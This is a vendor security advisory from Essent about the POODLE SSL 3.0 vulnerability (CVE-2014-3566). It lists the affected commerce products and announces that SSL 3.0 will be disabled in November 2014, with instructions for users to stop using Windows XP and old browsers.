Problem
A critical vulnerability known as POODLE (Padding Oracle on Downgraded Legacy Encryption) has been discovered with Secure Sockets Layer version 3.0 (SSL 3.0). This universal Internet vulnerability affects the protocol and all legacy Internet browsers which rely on the protocol.
Essent Service Impact Analysis
Even before this announcement, following established Essent security policies, Essent disabled weak legacy encryption protocols on all Essent public web servers. SSL 3.0 is still in production for encrypted web traffic originating from Windows XP users using Internet Explorer 6.0, but the attack surface area is minimized and the threat is mitigated.
Some Essent software products and services are interfaced via a browser. Essent offers SSL 3.0 to provide encrypted communications for Windows XP users and older browsers limited to SSL 3.0 encryption. Commerce products including SiteBuilder™, PunchOutNow™, Direct2Decoration™, and OrderTrax™ are impacted as a result. The Essent Commerce Cloud™, and by extension its users, that utilized SSL 3.0 are exposed to this vulnerability under certain circumstances beyond the control of Essent. Essent Compass™ and Essent security products, like The Netset™ Network Security Appliance are not affected.
Guided by Essent security policies, Essent previously notified Facility Management Support (FMS) service subscribers to discontinue the use of Windows XP and outdated browsers. Subscribers that followed these guidelines throughout their organization should not be impacted.
Due to previous Essent actions and the nature of the vulnerability, the threat is minimal to Essent consumers but Essent takes these issues very seriously. Affected systems are upgradable and newer encryption protocols exist. Remedies are indicated and will be implemented by Essent that will affect users of obsolete technology.
Corrective Action
SSL 3.0 will be disabled for Essent software products and services as of Monday, November 24, 2014 12:00am ET to give users time to update their software and configurations.
Users are directed to immediately discontinue the use of Windows XP and outdated browsers. No matter the browser version, users are directed to disable SSL 3.0 within all browsers they have installed.
Users can test system configuration and obtain instructions to disable SSL 3.0 for popular browsers at: https://zmap.io/sslv3/browsers.html
It is recommended that subscribers notify their customers that directly utilize Essent systems of this notice and Corrective Action.
Details
This vulnerability, which has been assigned CVE identifiers CVE-2014-3566, details that "The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.”